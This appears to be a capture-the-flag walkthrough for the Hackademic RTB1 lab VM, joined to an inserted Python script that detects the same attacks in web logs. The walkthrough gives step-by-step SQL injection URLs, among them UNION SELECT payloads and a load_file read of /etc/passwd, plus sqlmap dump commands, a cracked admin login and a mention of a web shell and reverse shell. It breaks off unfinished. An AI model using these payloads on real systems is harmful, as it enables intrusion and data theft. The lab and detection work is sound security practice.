1. Information gathering

http://192.168.111.132/Hackademic_RTB1/?cat=1

http://192.168.111.132/Hackademic_RTB1/?cat=1%27

http://192.168.111.132/Hackademic_RTB1/?cat=1%20order%20by%201

http://192.168.111.132/Hackademic_RTB1/?cat=1%20order%20by%206

http://192.168.111.132/Hackademic_RTB1/?cat=1%20union%20select%201,2,3,4,5

http://192.168.111.132/Hackademic_RTB1/?cat=1%20and%201=1%20union%20select%201,2,3,4,5

http://192.168.111.132/Hackademic_RTB1/?cat=1%20and%201=2%20union%20select%201,2,3,4,5

http://192.168.111.132/Hackademic_RTB1/?cat=1%20and%201=2%20union%20select%201,@@version,3,4,5

http://192.168.111.132/Hackademic_RTB1/?cat=1 and 1=2 union select 1,group_concat(schema_name),3,4,5 from information_schema.schemata

http://192.168.111.132/Hackademic_RTB1/?cat=1 and 1=2 union select 1,load_file('/etc/passwd'),3,4,5 from mysql.user

Or use sqlmap:
sqlmap -u http://192.168.111.132/Hackademic_RTB1/?cat=1 --dbs

sqlmap -u http://192.168.111.132/Hackademic_RTB1/?cat=1 --dbs --batch --dump
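A defender-side counterpart to the probing sequence above, added here as an example and not part of the original write-up: it URL-decodes the request path of each Apache-style access-log line and flags the payload shapes used in this lab (quote probe, ORDER BY column enumeration, UNION SELECT, @@version, information_schema, load_file). The log lines, client IP and timestamps are constructed; the rule names are the author's own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample of Apache-style access log lines (not from the original page);
# the paths mirror the request shapes shown in the walkthrough above.
SAMPLE_LOG = """\
192.168.111.1 - - [10/Oct/2023:12:00:01 +0000] "GET /Hackademic_RTB1/?cat=1 HTTP/1.1" 200 5120
192.168.111.1 - - [10/Oct/2023:12:00:02 +0000] "GET /Hackademic_RTB1/?cat=1%27 HTTP/1.1" 500 312
192.168.111.1 - - [10/Oct/2023:12:00:03 +0000] "GET /Hackademic_RTB1/?cat=1%20order%20by%206 HTTP/1.1" 500 312
192.168.111.1 - - [10/Oct/2023:12:00:04 +0000] "GET /Hackademic_RTB1/?cat=1%20and%201=2%20union%20select%201,@@version,3,4,5 HTTP/1.1" 200 4870
192.168.111.1 - - [10/Oct/2023:12:00:05 +0000] "GET /Hackademic_RTB1/?cat=1+and+1=2+union+select+1,load_file('/etc/passwd'),3,4,5+from+mysql.user HTTP/1.1" 200 6011
192.168.111.1 - - [10/Oct/2023:12:00:06 +0000] "GET /Hackademic_RTB1/?p=2 HTTP/1.1" 200 4400
"""

# Pull the request path out of the quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Each rule: (name, regex applied to the decoded, lower-cased query string).
RULES = [
    ("quote_probe", re.compile(r"=\d+'(?:\s|$|&)")),
    ("order_by_enum", re.compile(r"\border\s+by\s+\d+")),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("version_read", re.compile(r"@@version")),
    ("schema_enum", re.compile(r"information_schema\.")),
    ("file_read", re.compile(r"\bload_file\s*\(")),
]

def decode_query(request_path):
    """Return the decoded, lower-cased query string; decoded twice so a
    double-encoded quote (%2527) is normalised like a plain one."""
    if "?" not in request_path:
        return ""
    query = request_path.split("?", 1)[1]
    return unquote_plus(unquote_plus(query)).lower()

def scan_access_log(text):
    """Return (line_number, request_path, [rule names]) for every request
    whose decoded query string matches at least one rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path = m.group(1)
        hits = [name for name, rx in RULES if rx.search(decode_query(path))]
        if hits:
            findings.append((lineno, path, hits))
    return findings

if __name__ == "__main__":
    for lineno, path, hits in scan_access_log(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(hits)} <- {path}")
```

Only lines 2 to 5 of the sample are flagged; the plain `?cat=1` and `?p=2` requests pass.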


Crack the dumped password hashes with an MD5 lookup.
Log in with the GeorgeMiller account, which has the highest privileges:
GeorgeMiller q1w2e3
This gives access to the admin backend.


Connect with AntSword (蚁剑) and bounce a shell back to Kali.


Upload the file.

Compilation failed.

Keep looking.